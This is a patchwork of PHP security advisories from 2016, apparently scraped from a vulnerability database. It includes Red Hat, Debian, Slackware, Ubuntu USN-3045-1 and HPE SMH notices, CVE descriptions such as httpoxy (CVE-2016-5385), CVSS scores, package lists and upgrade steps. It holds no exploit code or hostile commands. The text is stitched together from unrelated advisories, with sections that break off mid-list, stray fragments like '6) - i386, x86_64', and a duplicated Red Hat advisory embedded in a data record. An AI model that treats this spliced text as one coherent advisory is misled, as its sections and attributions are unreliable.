x86_64: php54-php-5.4.40-4.el7.x86_64.rpm php54-php-bcmath-5.4.40-4.el7.x86_64.rpm php54-php-cli-5.4.40-4.el7.x86_64.rpm php54-php-common-5.4.40-4.el7.x86_64.rpm php54-php-dba-5.4.40-4.el7.x86_64.rpm php54-php-debuginfo-5.4.40-4.el7.x86_64.rpm php54-php-devel-5.4.40-4.el7.x86_64.rpm php54-php-enchant-5.4.40-4.el7.x86_64.rpm php54-php-fpm-5.4.40-4.el7.x86_64.rpm php54-php-gd-5.4.40-4.el7.x86_64.rpm php54-php-intl-5.4.40-4.el7.x86_64.rpm php54-php-ldap-5.4.40-4.el7.x86_64.rpm php54-php-mbstring-5.4.40-4.el7.x86_64.rpm php54-php-mysqlnd-5.4.40-4.el7.x86_64.rpm php54-php-odbc-5.4.40-4.el7.x86_64.rpm php54-php-pdo-5.4.40-4.el7.x86_64.rpm php54-php-pgsql-5.4.40-4.el7.x86_64.rpm php54-php-process-5.4.40-4.el7.x86_64.rpm php54-php-pspell-5.4.40-4.el7.x86_64.rpm php54-php-recode-5.4.40-4.el7.x86_64.rpm php54-php-snmp-5.4.40-4.el7.x86_64.rpm php54-php-soap-5.4.40-4.el7.x86_64.rpm php54-php-xml-5.4.40-4.el7.x86_64.rpm php54-php-xmlrpc-5.4.40-4.el7.x86_64.rpm
Red Hat Software Collections for Red Hat Enterprise Linux Workstation (v. 7):
Source: php54-php-5.4.40-4.el7.src.rpm
x86_64: php54-php-5.4.40-4.el7.x86_64.rpm php54-php-bcmath-5.4.40-4.el7.x86_64.rpm php54-php-cli-5.4.40-4.el7.x86_64.rpm php54-php-common-5.4.40-4.el7.x86_64.rpm php54-php-dba-5.4.40-4.el7.x86_64.rpm php54-php-debuginfo-5.4.40-4.el7.x86_64.rpm php54-php-devel-5.4.40-4.el7.x86_64.rpm php54-php-enchant-5.4.40-4.el7.x86_64.rpm php54-php-fpm-5.4.40-4.el7.x86_64.rpm php54-php-gd-5.4.40-4.el7.x86_64.rpm php54-php-intl-5.4.40-4.el7.x86_64.rpm php54-php-ldap-5.4.40-4.el7.x86_64.rpm php54-php-mbstring-5.4.40-4.el7.x86_64.rpm php54-php-mysqlnd-5.4.40-4.el7.x86_64.rpm php54-php-odbc-5.4.40-4.el7.x86_64.rpm php54-php-pdo-5.4.40-4.el7.x86_64.rpm php54-php-pgsql-5.4.40-4.el7.x86_64.rpm php54-php-process-5.4.40-4.el7.x86_64.rpm php54-php-pspell-5.4.40-4.el7.x86_64.rpm php54-php-recode-5.4.40-4.el7.x86_64.rpm php54-php-snmp-5.4.40-4.el7.x86_64.rpm php54-php-soap-5.4.40-4.el7.x86_64.rpm php54-php-xml-5.4.40-4.el7.x86_64.rpm php54-php-xmlrpc-5.4.40-4.el7.x86_64.rpm
These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/
- Contact:
The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/
Copyright 2016 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1
iD8DBQFXrPSRXlSAg2UNWIIRAm7eAJ46bwD5dNGjO2qoFKsoL92xftbbTgCgkeMg 3r5SaIOUCU9fw1VuBLjTlPI= =fzN3 -----END PGP SIGNATURE-----
-- RHSA-announce mailing list RHSA-announce@redhat.com https://www.redhat.com/mailman/listinfo/rhsa-announce .
The vulnerabilities are addressed by upgrading PHP to the new upstream version 5.6.24, which includes additional bug fixes. Please refer to the upstream changelog for more information:
https://php.net/ChangeLog-5.php#5.6.24
For the stable distribution (jessie), these problems have been fixed in version 5.6.24+dfsg-0+deb8u1.
For the unstable distribution (sid), these problems have been fixed in version 7.0.9-1 of the php7.0 source package.
We recommend that you upgrade your php5 packages.
Here are the details from the Slackware 14.2 ChangeLog: +--------------------------+ patches/packages/php-5.6.24-i586-1_slack14.2.txz: Upgraded. For more information, see: http://php.net/ChangeLog-5.php#5.6.24 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5385 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-6207 ( Security fix ) +--------------------------+
Where to find the new packages: +-----------------------------+
Thanks to the friendly folks at the OSU Open Source Lab (http://osuosl.org) for donating FTP and rsync hosting to the Slackware project! :-)
Also see the "Get Slack" section on http://slackware.com for additional mirror sites near you.
Updated package for Slackware 14.0: ftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/php-5.6.24-i486-1_slack14.0.txz
Updated package for Slackware x86_64 14.0: ftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/php-5.6.24-x86_64-1_slack14.0.txz
Updated package for Slackware 14.1: ftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/php-5.6.24-i486-1_slack14.1.txz
Updated package for Slackware x86_64 14.1: ftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/php-5.6.24-x86_64-1_slack14.1.txz
Updated package for Slackware 14.2: ftp://ftp.slackware.com/pub/slackware/slackware-14.2/patches/packages/php-5.6.24-i586-1_slack14.2.txz
Updated package for Slackware x86_64 14.2: ftp://ftp.slackware.com/pub/slackware/slackware64-14.2/patches/packages/php-5.6.24-x86_64-1_slack14.2.txz
Updated package for Slackware -current: ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/n/php-5.6.24-i586-1.txz
Updated package for Slackware x86_64 -current: ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/n/php-5.6.24-x86_64-1.txz
MD5 signatures: +-------------+
Slackware 14.0 package: 712cc177c9ac10f3d58e871ff27260dc php-5.6.24-i486-1_slack14.0.txz
Slackware x86_64 14.0 package: 47f6ad4a81517f5b2959abc73475742b php-5.6.24-x86_64-1_slack14.0.txz
Slackware 14.1 package: aea6a8869946186781e55c5ecec952b0 php-5.6.24-i486-1_slack14.1.txz
Slackware x86_64 14.1 package: ab16db742762605b9b219b37cdd7e8db php-5.6.24-x86_64-1_slack14.1.txz
Slackware 14.2 package: c88a731667e741443712267d9b30286a php-5.6.24-i586-1_slack14.2.txz
Slackware x86_64 14.2 package: ed5b31c94e2fb91f0e6c40051f51da1c php-5.6.24-x86_64-1_slack14.2.txz
Slackware -current package: c25a85fece34101d35b8785022cef94d n/php-5.6.24-i586-1.txz
Slackware x86_64 -current package: 17f8886fc0901cea6d593170ea00fe7b n/php-5.6.24-x86_64-1.txz
Installation instructions: +------------------------+
Upgrade the package as root:
upgradepkg php-5.6.24-i586-1_slack14.2.txz
Then, restart Apache httpd:
/etc/rc.d/rc.httpd stop
/etc/rc.d/rc.httpd start
+-----+
Slackware Linux Security Team http://slackware.com/gpg-key security@slackware.com
+------------------------------------------------------------------------+ | To leave the slackware-security mailing list: | +------------------------------------------------------------------------+ | Send an email to majordomo@slackware.com with this text in the body of | | the email message: | | | | unsubscribe slackware-security | | | | You will get a confirmation message back containing instructions to | | complete the process. Please do not reply to this email address. 6) - i386, x86_64
3.
Ubuntu Security Notice USN-3045-1 August 02, 2016
php5, php7.0 vulnerabilities
A security issue affects these releases of Ubuntu and its derivatives:
- Ubuntu 16.04 LTS
- Ubuntu 14.04 LTS
- Ubuntu 12.04 LTS
Summary:
Several security issues were fixed in PHP.
Software Description: - php7.0: HTML-embedded scripting language interpreter - php5: HTML-embedded scripting language interpreter
Details:
It was discovered that PHP incorrectly handled certain SplMinHeap::compar e operations. A remote attacker could use this issue to cause PHP to crash,
resulting in a denial of service, or possibly execute arbitrary code. Thi s issue only affected Ubuntu 12.04 LTS and Ubuntu 14.04 LTS. (CVE-2015-4116 )
It was discovered that PHP incorrectly handled recursive method calls. A remote attacker could use this issue to cause PHP to crash, resulting in a denial of service. This issue only affected Ubuntu 12.04 LTS and Ubuntu 14.04 LTS. (CVE-2015-8873)
It was discovered that PHP incorrectly validated certain Exception object s when unserializing data. A remote attacker could use this issue to cause PHP to crash, resulting in a denial of service, or possibly execute arbitrary code. This issue only affected Ubuntu 12.04 LTS and Ubuntu 14.0 4 LTS. (CVE-2015-8876)
It was discovered that PHP header() function performed insufficient filtering for Internet Explorer. A remote attacker could possibly use thi s issue to perform a XSS attack. This issue only affected Ubuntu 12.04 LTS and Ubuntu 14.04 LTS. (CVE-2015-8935)
It was discovered that PHP incorrectly handled certain locale operations.
An attacker could use this issue to cause PHP to crash, resulting in a denial of service. This issue only affected Ubuntu 12.04 LTS and Ubuntu 14.04 LTS. (CVE-2016-5093)
It was discovered that the PHP php_html_entities() function incorrectly handled certain string lengths. A remote attacker could use this issue to
cause PHP to crash, resulting in a denial of service, or possibly execute
arbitrary code. This issue only affected Ubuntu 12.04 LTS and Ubuntu 14.0 4 LTS. (CVE-2016-5094, CVE-2016-5095)
It was discovered that the PHP fread() function incorrectly handled certa in lengths. An attacker could use this issue to cause PHP to crash, resultin g in a denial of service, or possibly execute arbitrary code. This issue on ly affected Ubuntu 12.04 LTS and Ubuntu 14.04 LTS. (CVE-2016-5096)
It was discovered that the PHP FastCGI Process Manager (FPM) SAPI incorrectly handled memory in the access logging feature. An attacker cou ld use this issue to cause PHP to crash, resulting in a denial of service, o r possibly expose sensitive information. This issue only affected Ubuntu 12.04 LTS and Ubuntu 14.04 LTS. (CVE-2016-5114)
It was discovered that PHP would not protect applications from contents o f the HTTP_PROXY environment variable when based on the contents of the Pro xy header from HTTP requests. A remote attacker could possibly use this issu e in combination with scripts that honour the HTTP_PROXY variable to redire ct outgoing HTTP requests. (CVE-2016-5385)
Hans Jerry Illikainen discovered that the PHP bzread() function incorrect ly performed error handling. A remote attacker could use this issue to cause
PHP to crash, resulting in a denial of service, or possibly execute arbitrary code. (CVE-2016-5399)
It was discovered that certain PHP multibyte string functions incorrectly
handled memory. A remote attacker could use this issue to cause PHP to crash, resulting in a denial of service, or possibly execute arbitrary code. This issue only affected Ubuntu 14.04 LTS. (CVE-2016-5768)
It was discovered that the PHP Mcrypt extension incorrectly handled memor y. A remote attacker could use this issue to cause PHP to crash, resulting i n a denial of service, or possibly execute arbitrary code. This issue only affected Ubuntu 12.04 LTS and Ubuntu 14.04 LTS. (CVE-2016-5769)
It was discovered that the PHP garbage collector incorrectly handled certain objects when unserializing malicious data. A remote attacker coul d use this issue to cause PHP to crash, resulting in a denial of service, o r possibly execute arbitrary code. This issue was only addressed in Ubuntu Ubuntu 14.04 LTS. (CVE-2016-5771, CVE-2016-5773)
It was discovered that PHP incorrectly handled memory when unserializing malicious xml data. A remote attacker could use this issue to cause PHP t o crash, resulting in a denial of service, or possibly execute arbitrary code. This issue only affected Ubuntu 12.04 LTS and Ubuntu 14.04 LTS. (CVE-2016-5772)
It was discovered that the PHP php_url_parse_ex() function incorrectly handled string termination. A remote attacker could use this issue to cau se PHP to crash, resulting in a denial of service, or possibly execute arbitrary code. This issue only affected Ubuntu 12.04 LTS and Ubuntu 14.0 4 LTS. (CVE-2016-6288)
It was discovered that PHP incorrectly handled path lengths when extracti ng certain Zip archives. A remote attacker could use this issue to cause PHP
to crash, resulting in a denial of service, or possibly execute arbitrary
code. (CVE-2016-6289)
It was discovered that PHP incorrectly handled session deserialization. A
remote attacker could use this issue to cause PHP to crash, resulting in a denial of service, or possibly execute arbitrary code. (CVE-2016-6290)
It was discovered that PHP incorrectly handled exif headers when processi ng certain JPEG images. A remote attacker could use this issue to cause PHP to crash, resulting in a denial of service, or possibly execute arbitrary code. (CVE-2016-6291, CVE-2016-6292)
It was discovered that PHP incorrectly handled certain locale operations. A remote attacker could use this issue to cause PHP to crash, resulting in a denial of service, or possibly execute arbitrary code. (CVE-2016-6294)
It was discovered that the PHP garbage collector incorrectly handled certain objects when unserializing SNMP data. A remote attacker could use
this issue to cause PHP to crash, resulting in a denial of service, or possibly execute arbitrary code. This issue only affected Ubuntu 14.04 LT S and Ubuntu 16.04 LTS. (CVE-2016-6295)
It was discovered that the PHP xmlrpc_encode_request() function incorrect ly handled certain lengths. An attacker could use this issue to cause PHP to
crash, resulting in a denial of service, or possibly execute arbitrary code. (CVE-2016-6296)
It was discovered that the PHP php_stream_zip_opener() function incorrect ly handled memory. An attacker could use this issue to cause PHP to crash, resulting in a denial of service, or possibly execute arbitrary code. (CVE-2016-6297)
Update instructions:
The problem can be corrected by updating your system to the following package versions:
Ubuntu 16.04 LTS: libapache2-mod-php7.0 7.0.8-0ubuntu0.16.04.2 php7.0-cgi 7.0.8-0ubuntu0.16.04.2 php7.0-cli 7.0.8-0ubuntu0.16.04.2 php7.0-fpm 7.0.8-0ubuntu0.16.04.2
Ubuntu 14.04 LTS: libapache2-mod-php5 5.5.9+dfsg-1ubuntu4.19 php5-cgi 5.5.9+dfsg-1ubuntu4.19 php5-cli 5.5.9+dfsg-1ubuntu4.19 php5-fpm 5.5.9+dfsg-1ubuntu4.19
Ubuntu 12.04 LTS: libapache2-mod-php5 5.3.10-1ubuntu3.24 php5-cgi 5.3.10-1ubuntu3.24 php5-cli 5.3.10-1ubuntu3.24 php5-fpm 5.3.10-1ubuntu3.24
In general, a standard system update will make all the necessary changes.
References: http://www.ubuntu.com/usn/usn-3045-1 CVE-2015-4116, CVE-2015-8873, CVE-2015-8876, CVE-2015-8935, CVE-2016-5093, CVE-2016-5094, CVE-2016-5095, CVE-2016-5096, CVE-2016-5114, CVE-2016-5385, CVE-2016-5399, CVE-2016-5768, CVE-2016-5769, CVE-2016-5771, CVE-2016-5772, CVE-2016-5773, CVE-2016-6288, CVE-2016-6289, CVE-2016-6290, CVE-2016-6291, CVE-2016-6292, CVE-2016-6294, CVE-2016-6295, CVE-2016-6296, CVE-2016-6297
Package Information: https://launchpad.net/ubuntu/+source/php7.0/7.0.8-0ubuntu0.16.04.2 https://launchpad.net/ubuntu/+source/php5/5.5.9+dfsg-1ubuntu4.19 https://launchpad.net/ubuntu/+source/php5/5.3.10-1ubuntu3.24
. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256
Note: the current version of the following document is available here: https://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-c05320149
SUPPORT COMMUNICATION - SECURITY BULLETIN
Document ID: c05320149 Version: 1
HPSBMU03653 rev.1 - HPE System Management Homepage (SMH), Remote Arbitrary Code Execution, Cross-Site Scripting (XSS), Denial of Service (DoS), Unauthorized Disclosure of Information
NOTICE: The information in this Security Bulletin should be acted upon as soon as possible.
Release Date: 2016-10-26 Last Updated: 2016-10-26
Potential Security Impact: Remote: Arbitrary Code Execution, Cross-Site Scripting (XSS), Denial of Service (DoS), Unauthorized Disclosure of Information
Source: Hewlett Packard Enterprise, Product Security Response Team
VULNERABILITY SUMMARY Multiple potential security vulnerabilities have been identified in HPE System Management Homepage (SMH) on Windows and Linux.
References:
- CVE-2016-2107 - OpenSSL, Unauthorized disclosure of information
- CVE-2016-2106 - OpenSSL, Denial of Service (DoS)
- CVE-2016-2109 - OpenSSL, Denial of Service (DoS)
- CVE-2016-2105 - OpenSSL, Denial of Service (DoS)
- CVE-2016-3739 - cURL and libcurl, Remote code execution
- CVE-2016-5388 - "HTTPoxy", Apache Tomcat
- CVE-2016-5387 - "HTTPoxy", Apache HTTP Server
- CVE-2016-5385 - "HTTPoxy", PHP
- CVE-2016-4543 - PHP, multiple impact
- CVE-2016-4071 - PHP, multiple impact
- CVE-2016-4072 - PHP, multiple impact
- CVE-2016-4542 - PHP, multiple impact
- CVE-2016-4541 - PHP, multiple impact
- CVE-2016-4540 - PHP, multiple impact
- CVE-2016-4539 - PHP, multiple impact
- CVE-2016-4538 - PHP, multiple impact
- CVE-2016-4537 - PHP, multiple impact
- CVE-2016-4343 - PHP, multiple impact
- CVE-2016-4342 - PHP, multiple impact
- CVE-2016-4070 - PHP, Denial of Service (DoS)
- CVE-2016-4393 - PSRT110263, XSS vulnerability
- CVE-2016-4394 - PSRT110263, HSTS vulnerability
- CVE-2016-4395 - ZDI-CAN-3722, PSRT110115, Buffer Overflow
- CVE-2016-4396 - ZDI-CAN-3730, PSRT110116, Buffer Overflow
- PSRT110145
- PSRT110263
- PSRT110115
- PSRT110116
SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.
- HPE System Management Homepage - all versions prior to v7.6
BACKGROUND
CVSS Base Metrics ================= Reference, CVSS V3 Score/Vector, CVSS V2 Score/Vector
CVE-2016-2105
7.5 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
5.0 (AV:N/AC:L/Au:N/C:N/I:N/A:P)
CVE-2016-2106
7.5 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
5.0 (AV:N/AC:L/Au:N/C:N/I:N/A:P)
CVE-2016-2107
5.9 CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N
2.6 (AV:N/AC:H/Au:N/C:P/I:N/A:N)
CVE-2016-2109
7.5 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
7.8 (AV:N/AC:L/Au:N/C:N/I:N/A:C)
CVE-2016-3739
5.3 CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:H/A:N
2.6 (AV:N/AC:H/Au:N/C:N/I:P/A:N)
CVE-2016-4070
7.5 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
5.0 (AV:N/AC:L/Au:N/C:N/I:N/A:P)
CVE-2016-4071
9.8 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)
CVE-2016-4072
9.8 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)
CVE-2016-4342
8.8 CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
8.3 (AV:N/AC:M/Au:N/C:P/I:P/A:C)
CVE-2016-4343
9.8 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P)
CVE-2016-4393
4.2 CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:N
4.9 (AV:N/AC:M/Au:S/C:P/I:P/A:N)
CVE-2016-4394
6.5 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L
5.8 (AV:N/AC:M/Au:N/C:N/I:P/A:P)
CVE-2016-4395
7.5 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N
7.8 (AV:N/AC:L/Au:N/C:N/I:C/A:N)
CVE-2016-4396
7.5 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N
7.8 (AV:N/AC:L/Au:N/C:N/I:C/A:N)
CVE-2016-4537
9.8 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)
CVE-2016-4538
9.8 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)
CVE-2016-4539
9.8 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)
CVE-2016-4540
9.8 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)
CVE-2016-4541
9.8 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)
CVE-2016-4542
9.8 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)
CVE-2016-4543
9.8 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)
CVE-2016-5385
8.1 CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
5.1 (AV:N/AC:H/Au:N/C:P/I:P/A:P)
CVE-2016-5387
8.1 CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
5.1 (AV:N/AC:H/Au:N/C:P/I:P/A:P)
CVE-2016-5388
8.1 CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
5.1 (AV:N/AC:H/Au:N/C:P/I:P/A:P)
Information on CVSS is documented in
HPE Customer Notice HPSN-2008-002 here:
https://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-c01345499
- Hewlett Packard Enterprise thanks Tenable Network Security for working with Trend Micro's Zero Day Initiative (ZDI) for reporting CVE-2016-4395 and CVE-2016-4396 to security-alert@hpe.com
RESOLUTION
HPE has made the following software updates available to resolve the vulnerabilities for the impacted versions of System Management Homepage (SMH).
Please download and install HPE System Management Homepage (SMH) v7.6.0 from the following locations:
HISTORY Version:1 (rev.1) - 26 October 2016 Initial release
Third Party Security Patches: Third party security patches that are to be installed on systems running Hewlett Packard Enterprise (HPE) software products should be applied in accordance with the customer's patch management policy.
Support: For issues about implementing the recommendations of this Security Bulletin, contact normal HPE Services support channel. For other issues about the content of this Security Bulletin, send e-mail to security-alert@hpe.com.
Report: To report a potential security vulnerability for any HPE supported product: Web form: https://www.hpe.com/info/report-security-vulnerability Email: security-alert@hpe.com
Subscribe: To initiate a subscription to receive future HPE Security Bulletin alerts via Email: http://www.hpe.com/support/Subscriber_Choice
Security Bulletin Archive: A list of recently released Security Bulletins is available here: http://www.hpe.com/support/Security_Bulletin_Archive
Software Product Category: The Software Product Category is represented in the title by the two characters following HPSB.
3C = 3COM 3P = 3rd Party Software GN = HPE General Software HF = HPE Hardware and Firmware MU = Multi-Platform Software NS = NonStop Servers OV = OpenVMS PV = ProCurve ST = Storage Software UX = HP-UX
Copyright 2016 Hewlett Packard Enterprise
Hewlett Packard Enterprise shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided "as is" without warranty of any kind. To the extent permitted by law, neither HP or its affiliates, subcontractors or suppliers will be liable for incidental,special or consequential damages including downtime cost; lost profits; damages relating to the procurement of substitute products or services; or damages for loss of data, or software restoration. The information in this document is subject to change without notice. Hewlett Packard Enterprise and the names of Hewlett Packard Enterprise products referenced herein are trademarks of Hewlett Packard Enterprise in the United States and other countries. Other product and company names mentioned herein may be trademarks of their respective owners. Please note that the Management Interface cannot access data stored on tape media, so this vulnerability does not allow for remote unauthorized disclosure of data stored on tape media or remote denial of service.
References:
- CVE-2016-5385 - PHP, HTTPoxy
- CVE-2016-3074 - PHP
- CVE-2013-7456 - PHP
- CVE-2016-5093 - PHP
- CVE-2016-5094 - PHP
- CVE-2016-5096 - PHP
- CVE-2016-5766 - PHP
- CVE-2016-5767 - PHP
- CVE-2016-5768 - PHP
- CVE-2016-5769 - PHP
- CVE-2016-5770 - PHP
- CVE-2016-5771 - PHP
- CVE-2016-5772 - PHP
- CVE-2016-5773 - PHP
- CVE-2016-6207 - GD Graphics Library
- CVE-2016-6289 - PHP
- CVE-2016-6290 - PHP
- CVE-2016-6291 - PHP
- CVE-2016-6292 - PHP
- CVE-2016-6293 - PHP
- CVE-2016-6294 - PHP
- CVE-2016-6295 - PHP
- CVE-2016-6296 - PHP
- CVE-2016-6297 - PHP
- CVE-2016-5399 - PHP
SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed
Show details on source website{
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"data": "PHP through 7.0.8 does not attempt to address RFC 3875 section 4.1.18 namespace conflicts and therefore does not protect applications from the presence of untrusted client data in the HTTP_PROXY environment variable, which might allow remote attackers to redirect an application\u0027s outbound HTTP traffic to an arbitrary proxy server via a crafted Proxy header in an HTTP request, as demonstrated by (1) an application that makes a getenv(\u0027HTTP_PROXY\u0027) call or (2) a CGI configuration of PHP, aka an \"httpoxy\" issue. Web servers running in a CGI or CGI-like context may assign client request Proxy header values to internal HTTP_PROXY environment variables. This vulnerability can be leveraged to conduct man-in-the-middle (MITM) attacks on internal subrequests or to direct the server to initiate connections to arbitrary hosts. PHP (PHP: Hypertext Preprocessor, PHP: Hypertext Preprocessor) is an open source general-purpose computer scripting language jointly maintained by the PHP Group and the open source community. The language is mainly used for Web development and supports a variety of databases and operating systems. There is a security vulnerability in PHP 7.0.8 and earlier versions, the vulnerability stems from the fact that the program does not resolve namespace conflicts in RFC 3875 mode. The program does not properly handle data from untrusted client applications in the HTTP_PROXY environment variable. A remote attacker uses the specially crafted Proxy header message in the HTTP request to exploit this vulnerability to implement a man-in-the-middle attack, directing the server to send a connection to any host. \n\nReferences:\n\n - CVE-2016-5385 - PHP, HTTPoxy\n\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. \n-----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\n=====================================================================\n Red Hat Security Advisory\n\nSynopsis: Moderate: php54-php security update\nAdvisory ID: RHSA-2016:1610-01\nProduct: Red Hat Software Collections\nAdvisory URL: https://rhn.redhat.com/errata/RHSA-2016-1610.html\nIssue date: 2016-08-11\nCVE Names: CVE-2016-5385 \n=====================================================================\n\n1. Summary:\n\nAn update for php54-php is now available for Red Hat Software Collections. \n\nRed Hat Product Security has rated this update as having a security impact\nof Moderate. A Common Vulnerability Scoring System (CVSS) base score, which\ngives a detailed severity rating, is available for each vulnerability from\nthe CVE link(s) in the References section. \n\n2. Relevant releases/architectures:\n\nRed Hat Software Collections for Red Hat Enterprise Linux Server (v. 6) - x86_64\nRed Hat Software Collections for Red Hat Enterprise Linux Server (v. 7) - x86_64\nRed Hat Software Collections for Red Hat Enterprise Linux Server EUS (v. 6.6) - x86_64\nRed Hat Software Collections for Red Hat Enterprise Linux Server EUS (v. 6.7) - x86_64\nRed Hat Software Collections for Red Hat Enterprise Linux Server EUS (v. 7.1) - x86_64\nRed Hat Software Collections for Red Hat Enterprise Linux Server EUS (v. 7.2) - x86_64\nRed Hat Software Collections for Red Hat Enterprise Linux Workstation (v. 6) - x86_64\nRed Hat Software Collections for Red Hat Enterprise Linux Workstation (v. 7) - x86_64\n\n3. (CVE-2016-5385)\n\nRed Hat would like to thank Scott Geary (VendHQ) for reporting this issue. \n\n4. Solution:\n\nFor details on how to apply this update, which includes the changes\ndescribed in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258\n\nAfter installing the updated packages, the httpd daemon must be restarted\nfor the update to take effect. \n\n5. Bugs fixed (https://bugzilla.redhat.com/):\n\n1353794 - CVE-2016-5385 PHP: sets environmental variable based on user supplied Proxy request header\n\n6. Package List:\n\nRed Hat Software Collections for Red Hat Enterprise Linux Server (v. 6):\n\nSource:\nphp54-php-5.4.40-4.el6.src.rpm\n\nx86_64:\nphp54-php-5.4.40-4.el6.x86_64.rpm\nphp54-php-bcmath-5.4.40-4.el6.x86_64.rpm\nphp54-php-cli-5.4.40-4.el6.x86_64.rpm\nphp54-php-common-5.4.40-4.el6.x86_64.rpm\nphp54-php-dba-5.4.40-4.el6.x86_64.rpm\nphp54-php-debuginfo-5.4.40-4.el6.x86_64.rpm\nphp54-php-devel-5.4.40-4.el6.x86_64.rpm\nphp54-php-enchant-5.4.40-4.el6.x86_64.rpm\nphp54-php-fpm-5.4.40-4.el6.x86_64.rpm\nphp54-php-gd-5.4.40-4.el6.x86_64.rpm\nphp54-php-imap-5.4.40-4.el6.x86_64.rpm\nphp54-php-intl-5.4.40-4.el6.x86_64.rpm\nphp54-php-ldap-5.4.40-4.el6.x86_64.rpm\nphp54-php-mbstring-5.4.40-4.el6.x86_64.rpm\nphp54-php-mysqlnd-5.4.40-4.el6.x86_64.rpm\nphp54-php-odbc-5.4.40-4.el6.x86_64.rpm\nphp54-php-pdo-5.4.40-4.el6.x86_64.rpm\nphp54-php-pgsql-5.4.40-4.el6.x86_64.rpm\nphp54-php-process-5.4.40-4.el6.x86_64.rpm\nphp54-php-pspell-5.4.40-4.el6.x86_64.rpm\nphp54-php-recode-5.4.40-4.el6.x86_64.rpm\nphp54-php-snmp-5.4.40-4.el6.x86_64.rpm\nphp54-php-soap-5.4.40-4.el6.x86_64.rpm\nphp54-php-tidy-5.4.40-4.el6.x86_64.rpm\nphp54-php-xml-5.4.40-4.el6.x86_64.rpm\nphp54-php-xmlrpc-5.4.40-4.el6.x86_64.rpm\n\nRed Hat Software Collections for Red Hat Enterprise Linux Server EUS (v. 